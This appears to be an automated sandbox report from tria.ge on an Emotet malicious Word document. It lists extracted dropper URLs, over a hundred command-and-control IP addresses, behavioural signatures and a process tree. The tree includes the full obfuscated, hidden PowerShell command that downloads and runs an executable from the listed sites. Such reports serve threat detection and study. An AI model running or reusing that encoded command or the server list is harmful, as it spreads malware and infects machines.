Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
19/12/2019, 14:32
General
Malware Config
Extracted
http://www.textilesunrise.com/anjuv/lymjn-kpc564-0052/
https://pakspaservices.com/cgi-bin/ykvrg-yt75yx1-43/
https://www.helenelagnieu.fr/wp-includes/lvtehd-cg9sdb-59/
http://ondesignstudio.in/sitemap/a5r48v5-6mpz-0938187/
https://www.lubinco.co.il/wp-content/LMnGPljQ/
Extracted
emotet
66.229.161.86:443
190.47.236.83:80
217.12.70.226:80
164.68.115.146:8080
5.189.148.98:8080
46.105.128.215:8080
69.30.205.162:7080
95.216.207.86:7080
128.92.54.20:80
185.192.75.240:443
41.77.74.214:443
190.38.252.45:443
124.150.175.129:8080
191.100.24.201:50000
178.134.1.238:80
72.51.153.27:80
210.224.65.117:80
83.156.88.159:80
190.171.135.235:80
100.38.11.243:80
188.230.134.205:80
217.181.139.237:443
212.129.14.27:8080
177.144.130.105:443
42.51.192.231:8080
67.254.196.78:443
181.167.35.84:80
220.78.29.88:80
211.42.204.154:80
192.241.220.183:8080
91.117.131.122:80
210.111.160.220:80
86.98.157.3:80
158.69.167.246:8080
88.247.26.78:80
113.52.135.33:7080
192.161.190.171:8080
89.215.225.15:80
81.82.247.216:80
221.154.59.110:80
182.176.116.139:995
119.57.36.54:8080
69.14.208.221:80
24.27.122.202:80
172.104.70.207:8080
192.210.217.94:8080
95.9.217.200:8080
175.103.239.50:80
108.184.9.44:80
51.38.134.203:8080
85.235.219.74:80
86.6.123.109:80
177.103.240.93:80
37.46.129.215:8080
211.218.105.101:80
59.158.164.66:443
78.46.87.133:8080
50.116.78.109:8080
120.51.83.89:443
78.187.204.70:80
216.75.37.196:8080
181.47.235.26:993
138.197.140.163:8080
201.196.15.79:990
203.153.216.178:7080
185.244.167.25:443
95.255.140.89:443
189.225.211.171:443
163.172.97.112:8080
58.93.151.148:80
177.103.201.23:80
187.233.220.93:443
124.150.175.133:80
82.146.55.23:7080
190.161.67.63:80
195.250.143.182:80
156.155.163.232:80
85.109.190.235:443
212.112.113.235:80
210.171.146.118:80
115.179.91.58:80
142.93.87.198:8080
72.27.212.209:8080
187.250.92.82:80
175.127.140.68:80
78.186.102.195:80
94.203.236.122:80
139.59.12.63:8080
98.15.140.226:80
91.117.31.181:80
162.144.46.90:8080
200.41.121.69:443
190.101.87.170:80
82.79.244.92:80
95.216.212.157:8080
96.234.38.186:8080
24.28.178.71:80
211.48.165.9:443
200.71.112.158:53
51.77.113.97:8080
186.84.173.136:8080
23.253.207.142:8080
37.59.24.25:8080
58.185.224.18:80
189.61.200.9:443
46.105.131.68:8080
190.17.94.108:443
92.16.222.156:80
110.2.118.164:80
201.183.251.100:80
46.17.6.116:8080
37.70.131.107:80
190.5.162.204:80
176.58.93.123:80
193.33.38.208:443
86.70.224.211:80
174.57.150.13:8080
181.46.176.38:80
87.9.181.247:80
110.142.161.90:80
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\727.exe => C:\Windows\SysWOW64\shadesgroup.exe 727.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4952 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4660 wrote to memory of 4396 4660 Powershell.exe 80 PID 4396 wrote to memory of 3828 4396 727.exe 81 PID 3760 wrote to memory of 4276 3760 shadesgroup.exe 83 -
Executes dropped EXE 4 IoCs
pid Process 4396 727.exe 3828 727.exe 3760 shadesgroup.exe 4276 shadesgroup.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4660 Powershell.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 3828 727.exe 4276 shadesgroup.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4952 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4952 WINWORD.EXE 4396 727.exe 3828 727.exe 3760 shadesgroup.exe 4276 shadesgroup.exe -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4660 5076 Powershell.exe 73 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4660 Powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a484f81bb19306144e2063631b3fb740c6b2b192e088aadaa2647e5f6bf7d31f.doc" /o ""1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4952
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABaAHIAagBrAHcAdwBwAGgAcwBtAHQAaAA9ACcARgBuAG8AYQB5AGIAZgBoAGkAagBlAHoAJwA7ACQARQBtAHUAcQBnAHMAcQBtAHkAbwAgAD0AIAAnADcAMgA3ACcAOwAkAEMAdwBsAGUAYQB6AGIAaABjAGsAZAB5AGsAPQAnAFQAbgB0AG8AbQBjAHgAeABxAHgAcAByACcAOwAkAFYAeQB0AHEAbgBnAGEAbwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARQBtAHUAcQBnAHMAcQBtAHkAbwArACcALgBlAHgAZQAnADsAJABHAHcAZQBiAGsAcABwAGkAPQAnAFMAZABnAGwAcQB2AGQAdQByAHEAcAByAGcAJwA7ACQARQBuAG8AcgBwAGQAZgBqAG0AdwB3AD0AJgAoACcAbgBlAHcALQAnACsAJwBvACcAKwAnAGIAagBlAGMAdAAnACkAIABOAGUAVAAuAHcARQBiAGMATABJAEUATgB0ADsAJABIAHQAawB0AHEAeQBlAGIAZwA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAZQB4AHQAaQBsAGUAcwB1AG4AcgBpAHMAZQAuAGMAbwBtAC8AYQBuAGoAdQB2AC8AbAB5AG0AagBuAC0AawBwAGMANQA2ADQALQAwADAANQAyAC8AKgBoAHQAdABwAHMAOgAvAC8AcABhAGsAcwBwAGEAcwBlAHIAdgBpAGMAZQBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AeQBrAHYAcgBnAC0AeQB0ADcANQB5AHgAMQAtADQAMwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AaABlAGwAZQBuAGUAbABhAGcAbgBpAGUAdQAuAGYAcgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGwAdgB0AGUAaABkAC0AYwBnADkAcwBkAGIALQA1ADkALwAqAGgAdAB0AHAAOgAvAC8AbwBuAGQAZQBzAGkAZwBuAHMAdAB1AGQAaQBvAC4AaQBuAC8AcwBpAHQAZQBtAGEAcAAvAGEANQByADQAOAB2ADUALQA2AG0AcAB6AC0AMAA5ADMAOAAxADgANwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbAB1AGIAaQBuAGMAbwAuAGMAbwAuAGkAbAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBMAE0AbgBHAFAAbABqAFEALwAnAC4AIgBzAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAVQBlAHoAdgBoAGwAaQBzAD0AJwBOAHoAdwB6AGIAYgBsAGwAdwB3AGkAdwBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABXAHEAbQB3AHkAcQB6AGcAbQBwAHUAIABpAG4AIAAkAEgAdABrAHQAcQB5AGUAYgBnACkAewB0AHIAeQB7ACQARQBuAG8AcgBwAGQAZgBqAG0AdwB3AC4AIgBkAE8AYABXAE4AbABgAG8AQQBEAGAARgBJAGwARQAiACgAJABXAHEAbQB3AHkAcQB6AGcAbQBwAHUALAAgACQAVgB5AHQAcQBuAGcAYQBvACkAOwAkAFQAdQB6AHMAawBvAHEAYQB6AHEAawBxAD0AJwBMAGoAbAB6AHAAZAB3AGcAdgBwAG8AZQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFYAeQB0AHEAbgBnAGEAbwApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADIANAA2ADEANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAVAAiACgAJABWAHkAdABxAG4AZwBhAG8AKQA7ACQAVAB4AHMAcgBhAG4AcQBpAHoAPQAnAFgAeQB3AGkAcgBrAHkAcQBrACcAOwBiAHIAZQBhAGsAOwAkAFgAdwBkAHgAbgB6AGsAZQBmAGkAZgB0AGcAPQAnAFkAbQBnAHUAYQBtAGMAaABmAHgAagBtACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAcAB6AHQAdwBhAHcAbgA9ACcAUgB5AHYAcgB5AHIAZgBxACcA1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:4660 -
C:\Users\Admin\727.exe"C:\Users\Admin\727.exe"2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4396 -
C:\Users\Admin\727.exe--fb62309a3⤵
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:3828
-
-
-
C:\Windows\SysWOW64\shadesgroup.exe"C:\Windows\SysWOW64\shadesgroup.exe"1⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3760 -
C:\Windows\SysWOW64\shadesgroup.exe--8164780f2⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:4276
-